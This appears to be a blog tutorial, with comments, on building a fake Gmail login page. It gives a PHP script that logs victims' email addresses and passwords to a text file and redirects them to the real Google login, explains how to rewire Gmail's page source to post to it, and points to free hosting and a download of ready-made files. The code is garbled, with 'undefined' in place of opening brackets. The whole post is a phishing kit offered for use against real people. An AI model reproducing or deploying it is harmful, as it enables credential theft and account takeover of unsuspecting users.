This step by step guide will show you how you can make your own Gmail Phishing (Fake) page easily...have fun!
Files we will be creating:
1. phishing.php
2. index.html
3. password.txt
1. phishing.php
2. index.html
3. password.txt
Refer the end of the post first!
Step 1: Creating phishing.php file
First of all we need a PHP script which will collect all the form data. Copy the following code in a text editor (notepad) and save it as phishing.php
<html> <body> <?php $handle = fopenundefined"password.txt", "a"); fwriteundefined$handle,$_POST["Email"]); fwriteundefined$handle,"\n"); fwriteundefined$handle,$_POST["Passwd"]); fwriteundefined$handle,"\n"); fwriteundefined$handle,"\n"); fcloseundefined$handle) ; headerundefined"Location:https://www.google.com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>
Step 2 : Creating index.html page
Goto Gmail.com (without logging in) , Right click anywhere in the browser and choose view page source. Open the source code in a text editor (notepad).
Step 3: Now a new window will pop-up where you can see all the HTML code. We need to look for word action. Press CRTL+F and search for action. You will find two action in the code so choose the right one by looking up the following screen-shot (ie, with form id="gaia_loginform"). Replace the link after action between the "..... " with phishing.php (as in the screen-shot)and save this page as index.html (not index.html.txt!!!).
Step 4: Creating text file (password.txt)
Now make a new empty text file and name it password.txt
Now you have all the three files required
Step 5: Final step
Upload all the 3 files in file manager of your web hosting. If you don't have your own web hosting at present, search for a free web hosing site which gives PHP access. I prefer www.phpzilla.net .
Sign up for a free web hosting plan on this site. Goto file manager and Upload all the 3 files and save it.
Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt file as plain text which you can view easily. Also the the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake.
You can save your time by simply downloading all the 3 file which I have already created.
Simply hit the Download button and get them all!
i can find the link(url) please help me
ReplyDeletehey you download 3 files & upload to site
Deletehttp://www.4shared.com/rar/sebcq9de/Gmail_Phishing.html